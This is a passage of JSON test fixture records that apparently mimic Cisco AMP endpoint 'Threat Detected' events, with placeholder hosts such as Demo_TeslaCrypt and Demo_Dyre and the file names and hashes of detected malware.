Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228943","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":913000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228942","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":913000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228941","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":897000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228940","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":211000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228939","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":117000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228938","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":821000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261640","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261638","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":680000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261637","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":665000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261636","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":509000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259028591575000,"timestamp":1610705845,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:17:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259028591575130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251439135752000,"timestamp":1610705841,"timestamp_nanoseconds":455000000,"date":"2021-01-15T10:17:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251439135752194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258981346935000,"timestamp":1610705834,"timestamp_nanoseconds":346000000,"date":"2021-01-15T10:17:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258981346934873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258929807327000,"timestamp":1610705822,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258929807327320","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668623368585000,"timestamp":1610705816,"timestamp_nanoseconds":753000000,"date":"2021-01-15T10:16:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668623368585250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668623368585000,"timestamp":1610705816,"timestamp_nanoseconds":733000000,"date":"2021-01-15T10:16:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668623368585249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668623368585000,"timestamp":1610705816,"timestamp_nanoseconds":324000000,"date":"2021-01-15T10:16:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668623368585248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258878267720000,"timestamp":1610705810,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:16:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258878267719767","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258826728112000,"timestamp":1610705798,"timestamp_nanoseconds":310000000,"date":"2021-01-15T10:16:38+00:00","event_type":"Threat 